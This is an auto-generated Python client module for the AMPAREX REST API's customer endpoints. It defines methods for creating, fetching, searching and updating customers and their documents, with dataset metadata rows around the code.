] | null | null | null |
"""
AMPAREX Rest API Documentation
    This is the description of the AMPAREX Rest API. All REST calls plus the corresponding data model are described in this documentation. Direct calls to the server are possible over this page.<br/>Following steps are needed to use the API:<br/><br/>1. Get the alias identifier of your login account from AMPAREX Software (Branch office administration) -> Service accounts -> your service account -> copy alias token)<br/>2. Please use the login URL /alias/{alias}/login under section \"Login\" below with your credentials to get a valid bearer token.<br/>3. Copy bearer token from login response<br/>4. Then click \"Authorize\" on the top of this page<br/>5. Insert into the field \"value\": \"Bearer {Your Bearer token}\" (without {}) for example \"Bearer 334d34d3dgh5tz5h5h\"<br/>6. Click Authorize<br/>7. Bearer token will be automatically used in the header for every following API call.<br/>8. Now you are ready to use the API<br/><br/>See also [documentation](https://manual.amparex.com/display/HAN/AMPAREX+API) for help<br/><br/>Documentation of all the used fields and objects is at the bottom of this page called \"Models\" # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from amparex.api_client import ApiClient, Endpoint as _Endpoint
from amparex.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from amparex.model.creation_response import CreationResponse
from amparex.model.customer import Customer
from amparex.model.customer_search_query import CustomerSearchQuery
from amparex.model.customer_to_save import CustomerToSave
from amparex.model.document import Document
from amparex.model.document_search_query import DocumentSearchQuery
from amparex.model.document_to_save import DocumentToSave
from amparex.model.list_result_wrapper_customer import ListResultWrapperCustomer
from amparex.model.list_result_wrapper_document import ListResultWrapperDocument
from amparex.model.list_result_wrapper_marketing_contact import ListResultWrapperMarketingContact
class CustomersApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
    """Build the CustomersApi, wiring one pre-configured _Endpoint per REST operation.

    Args:
        api_client (ApiClient, optional): client used to perform the HTTP
            requests; a default ApiClient is constructed when omitted.

    Generated code — the endpoint dictionaries below mirror the OpenAPI spec
    (paths, parameter locations, types, and accepted content types) verbatim.
    """
    if api_client is None:
        api_client = ApiClient()
    self.api_client = api_client
    # POST /alias/{alias}/protected/customers -> CreationResponse
    self.create_customer_using_post_endpoint = _Endpoint(
        settings={
            'response_type': (CreationResponse,),
            'auth': ['security_token'],
            'endpoint_path': '/alias/{alias}/protected/customers',
            'operation_id': 'create_customer_using_post',
            'http_method': 'POST',
            'servers': None,
        },
        params_map={
            'all': ['alias', 'to_save'],
            'required': ['alias', 'to_save'],
            'nullable': [],
            'enum': [],
            'validation': []
        },
        root_map={
            'validations': {},
            'allowed_values': {},
            'openapi_types': {
                'alias': (str,),
                'to_save': (CustomerToSave,),
            },
            'attribute_map': {'alias': 'alias'},
            'location_map': {'alias': 'path', 'to_save': 'body'},
            'collection_format_map': {}
        },
        headers_map={
            'accept': ['application/json'],
            'content_type': ['application/json']
        },
        api_client=api_client
    )
    # POST /alias/{alias}/protected/customers/{id}/documents -> CreationResponse
    self.create_document_using_post_endpoint = _Endpoint(
        settings={
            'response_type': (CreationResponse,),
            'auth': ['security_token'],
            'endpoint_path': '/alias/{alias}/protected/customers/{id}/documents',
            'operation_id': 'create_document_using_post',
            'http_method': 'POST',
            'servers': None,
        },
        params_map={
            'all': ['alias', 'id', 'to_save'],
            'required': ['alias', 'id', 'to_save'],
            'nullable': [],
            'enum': [],
            'validation': []
        },
        root_map={
            'validations': {},
            'allowed_values': {},
            'openapi_types': {
                'alias': (str,),
                'id': (str,),
                'to_save': (DocumentToSave,),
            },
            'attribute_map': {'alias': 'alias', 'id': 'id'},
            'location_map': {'alias': 'path', 'id': 'path', 'to_save': 'body'},
            'collection_format_map': {}
        },
        headers_map={
            'accept': ['application/json'],
            'content_type': ['application/json']
        },
        api_client=api_client
    )
    # GET /alias/{alias}/protected/customers/orderbyfields -> [str]
    self.get_customer_order_by_fields_using_get_endpoint = _Endpoint(
        settings={
            'response_type': ([str],),
            'auth': ['security_token'],
            'endpoint_path': '/alias/{alias}/protected/customers/orderbyfields',
            'operation_id': 'get_customer_order_by_fields_using_get',
            'http_method': 'GET',
            'servers': None,
        },
        params_map={
            'all': ['alias'],
            'required': ['alias'],
            'nullable': [],
            'enum': [],
            'validation': []
        },
        root_map={
            'validations': {},
            'allowed_values': {},
            'openapi_types': {
                'alias': (str,),
            },
            'attribute_map': {'alias': 'alias'},
            'location_map': {'alias': 'path'},
            'collection_format_map': {}
        },
        headers_map={
            'accept': ['application/json'],
            'content_type': [],
        },
        api_client=api_client
    )
    # GET /alias/{alias}/protected/customers/{id} -> Customer
    self.get_customer_using_get_endpoint = _Endpoint(
        settings={
            'response_type': (Customer,),
            'auth': ['security_token'],
            'endpoint_path': '/alias/{alias}/protected/customers/{id}',
            'operation_id': 'get_customer_using_get',
            'http_method': 'GET',
            'servers': None,
        },
        params_map={
            'all': ['alias', 'id'],
            'required': ['alias', 'id'],
            'nullable': [],
            'enum': [],
            'validation': []
        },
        root_map={
            'validations': {},
            'allowed_values': {},
            'openapi_types': {
                'alias': (str,),
                'id': (str,),
            },
            'attribute_map': {'alias': 'alias', 'id': 'id'},
            'location_map': {'alias': 'path', 'id': 'path'},
            'collection_format_map': {}
        },
        headers_map={
            'accept': ['application/json'],
            'content_type': [],
        },
        api_client=api_client
    )
    # GET .../customers/{cid}/documents/{did}/binary -> str (octet-stream);
    # image_width is the only optional query parameter in this API.
    self.get_document_binary_using_get_endpoint = _Endpoint(
        settings={
            'response_type': (str,),
            'auth': ['security_token'],
            'endpoint_path': '/alias/{alias}/protected/customers/{cid}/documents/{did}/binary',
            'operation_id': 'get_document_binary_using_get',
            'http_method': 'GET',
            'servers': None,
        },
        params_map={
            'all': ['alias', 'cid', 'did', 'image_width'],
            'required': ['alias', 'cid', 'did'],
            'nullable': [],
            'enum': [],
            'validation': []
        },
        root_map={
            'validations': {},
            'allowed_values': {},
            'openapi_types': {
                'alias': (str,),
                'cid': (str,),
                'did': (str,),
                'image_width': (int,),
            },
            'attribute_map': {'alias': 'alias', 'cid': 'cid', 'did': 'did', 'image_width': 'imageWidth'},
            'location_map': {'alias': 'path', 'cid': 'path', 'did': 'path', 'image_width': 'query'},
            'collection_format_map': {}
        },
        headers_map={
            'accept': ['application/octet-stream', 'application/json'],
            'content_type': [],
        },
        api_client=api_client
    )
    # GET .../customers/{cid}/documents/{did} -> Document (metadata only)
    self.get_document_using_get_endpoint = _Endpoint(
        settings={
            'response_type': (Document,),
            'auth': ['security_token'],
            'endpoint_path': '/alias/{alias}/protected/customers/{cid}/documents/{did}',
            'operation_id': 'get_document_using_get',
            'http_method': 'GET',
            'servers': None,
        },
        params_map={
            'all': ['alias', 'cid', 'did'],
            'required': ['alias', 'cid', 'did'],
            'nullable': [],
            'enum': [],
            'validation': []
        },
        root_map={
            'validations': {},
            'allowed_values': {},
            'openapi_types': {
                'alias': (str,),
                'cid': (str,),
                'did': (str,),
            },
            'attribute_map': {'alias': 'alias', 'cid': 'cid', 'did': 'did'},
            'location_map': {'alias': 'path', 'cid': 'path', 'did': 'path'},
            'collection_format_map': {}
        },
        headers_map={
            'accept': ['application/json'],
            'content_type': [],
        },
        api_client=api_client
    )
    # GET .../customers/{id}/marketingcontacts -> ListResultWrapperMarketingContact
    self.get_marketing_contacts_using_get_endpoint = _Endpoint(
        settings={
            'response_type': (ListResultWrapperMarketingContact,),
            'auth': ['security_token'],
            'endpoint_path': '/alias/{alias}/protected/customers/{id}/marketingcontacts',
            'operation_id': 'get_marketing_contacts_using_get',
            'http_method': 'GET',
            'servers': None,
        },
        params_map={
            'all': ['alias', 'id'],
            'required': ['alias', 'id'],
            'nullable': [],
            'enum': [],
            'validation': []
        },
        root_map={
            'validations': {},
            'allowed_values': {},
            'openapi_types': {
                'alias': (str,),
                'id': (str,),
            },
            'attribute_map': {'alias': 'alias', 'id': 'id'},
            'location_map': {'alias': 'path', 'id': 'path'},
            'collection_format_map': {}
        },
        headers_map={
            'accept': ['application/json'],
            'content_type': [],
        },
        api_client=api_client
    )
    # POST /alias/{alias}/protected/customers/search -> ListResultWrapperCustomer
    self.search_customers_using_post_endpoint = _Endpoint(
        settings={
            'response_type': (ListResultWrapperCustomer,),
            'auth': ['security_token'],
            'endpoint_path': '/alias/{alias}/protected/customers/search',
            'operation_id': 'search_customers_using_post',
            'http_method': 'POST',
            'servers': None,
        },
        params_map={
            'all': ['alias', 'customer_search_query'],
            'required': ['alias', 'customer_search_query'],
            'nullable': [],
            'enum': [],
            'validation': []
        },
        root_map={
            'validations': {},
            'allowed_values': {},
            'openapi_types': {
                'alias': (str,),
                'customer_search_query': (CustomerSearchQuery,),
            },
            'attribute_map': {'alias': 'alias'},
            'location_map': {'alias': 'path', 'customer_search_query': 'body'},
            'collection_format_map': {}
        },
        headers_map={
            'accept': ['application/json'],
            'content_type': ['application/json']
        },
        api_client=api_client
    )
    # POST .../customers/{id}/documents/search -> ListResultWrapperDocument
    self.search_documents_using_post_endpoint = _Endpoint(
        settings={
            'response_type': (ListResultWrapperDocument,),
            'auth': ['security_token'],
            'endpoint_path': '/alias/{alias}/protected/customers/{id}/documents/search',
            'operation_id': 'search_documents_using_post',
            'http_method': 'POST',
            'servers': None,
        },
        params_map={
            'all': ['alias', 'id', 'search_query'],
            'required': ['alias', 'id', 'search_query'],
            'nullable': [],
            'enum': [],
            'validation': []
        },
        root_map={
            'validations': {},
            'allowed_values': {},
            'openapi_types': {
                'alias': (str,),
                'id': (str,),
                'search_query': (DocumentSearchQuery,),
            },
            'attribute_map': {'alias': 'alias', 'id': 'id'},
            'location_map': {'alias': 'path', 'id': 'path', 'search_query': 'body'},
            'collection_format_map': {}
        },
        headers_map={
            'accept': ['application/json'],
            'content_type': ['application/json']
        },
        api_client=api_client
    )
    # POST .../treatments/{id}/documents/search -> ListResultWrapperDocument
    # ("post1" suffix: generator disambiguation of a second search_documents op).
    self.search_documents_using_post1_endpoint = _Endpoint(
        settings={
            'response_type': (ListResultWrapperDocument,),
            'auth': ['security_token'],
            'endpoint_path': '/alias/{alias}/protected/treatments/{id}/documents/search',
            'operation_id': 'search_documents_using_post1',
            'http_method': 'POST',
            'servers': None,
        },
        params_map={
            'all': ['alias', 'id', 'search_query'],
            'required': ['alias', 'id', 'search_query'],
            'nullable': [],
            'enum': [],
            'validation': []
        },
        root_map={
            'validations': {},
            'allowed_values': {},
            'openapi_types': {
                'alias': (str,),
                'id': (str,),
                'search_query': (DocumentSearchQuery,),
            },
            'attribute_map': {'alias': 'alias', 'id': 'id'},
            'location_map': {'alias': 'path', 'id': 'path', 'search_query': 'body'},
            'collection_format_map': {}
        },
        headers_map={
            'accept': ['application/json'],
            'content_type': ['application/json']
        },
        api_client=api_client
    )
    # PATCH /alias/{alias}/protected/customers/{id} -> no response body
    self.update_customer_using_patch_endpoint = _Endpoint(
        settings={
            'response_type': None,
            'auth': ['security_token'],
            'endpoint_path': '/alias/{alias}/protected/customers/{id}',
            'operation_id': 'update_customer_using_patch',
            'http_method': 'PATCH',
            'servers': None,
        },
        params_map={
            'all': ['alias', 'id', 'to_update'],
            'required': ['alias', 'id', 'to_update'],
            'nullable': [],
            'enum': [],
            'validation': []
        },
        root_map={
            'validations': {},
            'allowed_values': {},
            'openapi_types': {
                'alias': (str,),
                'id': (str,),
                'to_update': (CustomerToSave,),
            },
            'attribute_map': {'alias': 'alias', 'id': 'id'},
            'location_map': {'alias': 'path', 'id': 'path', 'to_update': 'body'},
            'collection_format_map': {}
        },
        headers_map={
            'accept': [],
            'content_type': ['application/json']
        },
        api_client=api_client
    )
    # PATCH .../customers/{cid}/documents/{did} -> no response body
    self.update_document_using_patch_endpoint = _Endpoint(
        settings={
            'response_type': None,
            'auth': ['security_token'],
            'endpoint_path': '/alias/{alias}/protected/customers/{cid}/documents/{did}',
            'operation_id': 'update_document_using_patch',
            'http_method': 'PATCH',
            'servers': None,
        },
        params_map={
            'all': ['alias', 'cid', 'did', 'to_update'],
            'required': ['alias', 'cid', 'did', 'to_update'],
            'nullable': [],
            'enum': [],
            'validation': []
        },
        root_map={
            'validations': {},
            'allowed_values': {},
            'openapi_types': {
                'alias': (str,),
                'cid': (str,),
                'did': (str,),
                'to_update': (DocumentToSave,),
            },
            'attribute_map': {'alias': 'alias', 'cid': 'cid', 'did': 'did'},
            'location_map': {'alias': 'path', 'cid': 'path', 'did': 'path', 'to_update': 'body'},
            'collection_format_map': {}
        },
        headers_map={
            'accept': [],
            'content_type': ['application/json']
        },
        api_client=api_client
    )
def create_customer_using_post(self, alias, to_save, **kwargs):
    """Create a new customer  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread (call .get() on it for the result).

    Args:
        alias (str): alias
        to_save (CustomerToSave): toSave

    Keyword Args:
        async_req (bool): execute the request asynchronously.
        _return_http_data_only (bool): return only the response data.
        _preload_content (bool): decode the urllib3 response body.
        _request_timeout (int/float/tuple): per-request timeout.
        _check_input_type (bool): type-check data sent to the server.
        _check_return_type (bool): type-check data received from the server.
        _host_index (int/None): server index; defaults to configuration.

    Returns:
        CreationResponse, or the request thread when async_req is True.
    """
    # Fill in the standard call options only where the caller omitted them.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['alias'] = alias
    kwargs['to_save'] = to_save
    return self.create_customer_using_post_endpoint.call_with_http_info(**kwargs)
def create_document_using_post(self, alias, id, to_save, **kwargs):
    """Create a new document for customer archive  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread (call .get() on it for the result).

    Args:
        alias (str): alias
        id (str): id
        to_save (DocumentToSave): toSave

    Keyword Args:
        async_req (bool): execute the request asynchronously.
        _return_http_data_only (bool): return only the response data.
        _preload_content (bool): decode the urllib3 response body.
        _request_timeout (int/float/tuple): per-request timeout.
        _check_input_type (bool): type-check data sent to the server.
        _check_return_type (bool): type-check data received from the server.
        _host_index (int/None): server index; defaults to configuration.

    Returns:
        CreationResponse, or the request thread when async_req is True.
    """
    # Fill in the standard call options only where the caller omitted them.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['alias'] = alias
    kwargs['id'] = id
    kwargs['to_save'] = to_save
    return self.create_document_using_post_endpoint.call_with_http_info(**kwargs)
def get_customer_order_by_fields_using_get(self, alias, **kwargs):
    """Get possible fields for orderby of customer fields  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread (call .get() on it for the result).

    Args:
        alias (str): alias

    Keyword Args:
        async_req (bool): execute the request asynchronously.
        _return_http_data_only (bool): return only the response data.
        _preload_content (bool): decode the urllib3 response body.
        _request_timeout (int/float/tuple): per-request timeout.
        _check_input_type (bool): type-check data sent to the server.
        _check_return_type (bool): type-check data received from the server.
        _host_index (int/None): server index; defaults to configuration.

    Returns:
        [str], or the request thread when async_req is True.
    """
    # Fill in the standard call options only where the caller omitted them.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['alias'] = alias
    return self.get_customer_order_by_fields_using_get_endpoint.call_with_http_info(**kwargs)
def get_customer_using_get(self, alias, id, **kwargs):
    """Get one specific customer by id  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread (call .get() on it for the result).

    Args:
        alias (str): alias
        id (str): id

    Keyword Args:
        async_req (bool): execute the request asynchronously.
        _return_http_data_only (bool): return only the response data.
        _preload_content (bool): decode the urllib3 response body.
        _request_timeout (int/float/tuple): per-request timeout.
        _check_input_type (bool): type-check data sent to the server.
        _check_return_type (bool): type-check data received from the server.
        _host_index (int/None): server index; defaults to configuration.

    Returns:
        Customer, or the request thread when async_req is True.
    """
    # Fill in the standard call options only where the caller omitted them.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['alias'] = alias
    kwargs['id'] = id
    return self.get_customer_using_get_endpoint.call_with_http_info(**kwargs)
def get_document_binary_using_get(self, alias, cid, did, **kwargs):
    """Get document of customer as blob  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread (call .get() on it for the result).

    Args:
        alias (str): alias
        cid (str): cid
        did (str): did

    Keyword Args:
        image_width (int): imageWidth. [optional]
        async_req (bool): execute the request asynchronously.
        _return_http_data_only (bool): return only the response data.
        _preload_content (bool): decode the urllib3 response body.
        _request_timeout (int/float/tuple): per-request timeout.
        _check_input_type (bool): type-check data sent to the server.
        _check_return_type (bool): type-check data received from the server.
        _host_index (int/None): server index; defaults to configuration.

    Returns:
        str, or the request thread when async_req is True.
    """
    # Fill in the standard call options only where the caller omitted them.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['alias'] = alias
    kwargs['cid'] = cid
    kwargs['did'] = did
    return self.get_document_binary_using_get_endpoint.call_with_http_info(**kwargs)
def get_document_using_get(self, alias, cid, did, **kwargs):
    """Get one specific document by id (without binary)  # noqa: E501

    Synchronous by default; pass async_req=True to get back the request
    thread (call .get() on it for the result).

    Args:
        alias (str): alias
        cid (str): cid
        did (str): did

    Keyword Args:
        async_req (bool): execute the request asynchronously.
        _return_http_data_only (bool): return only the response data.
        _preload_content (bool): decode the urllib3 response body.
        _request_timeout (int/float/tuple): per-request timeout.
        _check_input_type (bool): type-check data sent to the server.
        _check_return_type (bool): type-check data received from the server.
        _host_index (int/None): server index; defaults to configuration.

    Returns:
        Document, or the request thread when async_req is True.
    """
    # Fill in the standard call options only where the caller omitted them.
    for option, default in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
        ('_host_index', None),
    ):
        kwargs.setdefault(option, default)
    kwargs['alias'] = alias
    kwargs['cid'] = cid
    kwargs['did'] = did
    return self.get_document_using_get_endpoint.call_with_http_info(**kwargs)
def get_marketing_contacts_using_get(
self,
alias,
id,
**kwargs
):
"""Get marketingcontacts for specific customer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_marketing_contacts_using_get(alias, id, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
id (str): id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ListResultWrapperMarketingContact
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['id'] = \
id
return self.get_marketing_contacts_using_get_endpoint.call_with_http_info(**kwargs)
def search_customers_using_post(
self,
alias,
customer_search_query,
**kwargs
):
"""Get a list of customers # noqa: E501
Get a list of customers by a search query, paging is used, specify limit and page; Model Type: Customer is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_customers_using_post(alias, customer_search_query, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
customer_search_query (CustomerSearchQuery): customerSearchQuery
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ListResultWrapperCustomer
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['customer_search_query'] = \
customer_search_query
return self.search_customers_using_post_endpoint.call_with_http_info(**kwargs)
def search_documents_using_post(
self,
alias,
id,
search_query,
**kwargs
):
"""Get a list of customer documents (without binary) # noqa: E501
Get a list of customer documents by a search query, paging is used, specify limit and page; Model Type: Documents is returned. Document is a wrapper, use id with documents/{id}/binary to get document binary itself # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_documents_using_post(alias, id, search_query, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
id (str): id
search_query (DocumentSearchQuery): searchQuery
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ListResultWrapperDocument
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['id'] = \
id
kwargs['search_query'] = \
search_query
return self.search_documents_using_post_endpoint.call_with_http_info(**kwargs)
def search_documents_using_post1(
self,
alias,
id,
search_query,
**kwargs
):
"""Get a list of treatment documents (without binary) # noqa: E501
Get a list of treatment documents by a search query, paging is used, specify limit and page; Model Type: Documents is returned. Document is a wrapper, use id with documents/{id}/binary to get document binary itself # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_documents_using_post1(alias, id, search_query, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
id (str): id
search_query (DocumentSearchQuery): searchQuery
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ListResultWrapperDocument
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['id'] = \
id
kwargs['search_query'] = \
search_query
return self.search_documents_using_post1_endpoint.call_with_http_info(**kwargs)
def update_customer_using_patch(
self,
alias,
id,
to_update,
**kwargs
):
"""Update customer with given id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_using_patch(alias, id, to_update, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
id (str): id
to_update (CustomerToSave): toUpdate
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['id'] = \
id
kwargs['to_update'] = \
to_update
return self.update_customer_using_patch_endpoint.call_with_http_info(**kwargs)
def update_document_using_patch(
self,
alias,
cid,
did,
to_update,
**kwargs
):
"""Update document with given id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_document_using_patch(alias, cid, did, to_update, async_req=True)
>>> result = thread.get()
Args:
alias (str): alias
cid (str): cid
did (str): did
to_update (DocumentToSave): toUpdate
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['alias'] = \
alias
kwargs['cid'] = \
cid
kwargs['did'] = \
did
kwargs['to_update'] = \
to_update
return self.update_document_using_patch_endpoint.call_with_http_info(**kwargs)
| 35.234936
| 1,241
| 0.477017
| 5,204
| 57,891
| 5.069562
| 0.055534
| 0.031385
| 0.023652
| 0.024562
| 0.879842
| 0.869419
| 0.855887
| 0.839588
| 0.816921
| 0.804298
| 0
| 0.00287
| 0.434333
| 57,891
| 1,642
| 1,242
| 35.256395
| 0.802761
| 0.341625
| 0
| 0.716535
| 0
| 0
| 0.217918
| 0.052692
| 0
| 0
| 0
| 0
| 0
| 1
| 0.011374
| false
| 0
| 0.012248
| 0
| 0.034996
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
205baa3cf0690d8d72e7af2c5f6b9685e87f2486
| 8,738
|
py
|
Python
|
test_align_io.py
|
ttesileanu/PyMulticov
|
03efb92b7391f60e6d1974709c67c7770eede10d
|
[
"MIT"
] | null | null | null |
test_align_io.py
|
ttesileanu/PyMulticov
|
03efb92b7391f60e6d1974709c67c7770eede10d
|
[
"MIT"
] | null | null | null |
test_align_io.py
|
ttesileanu/PyMulticov
|
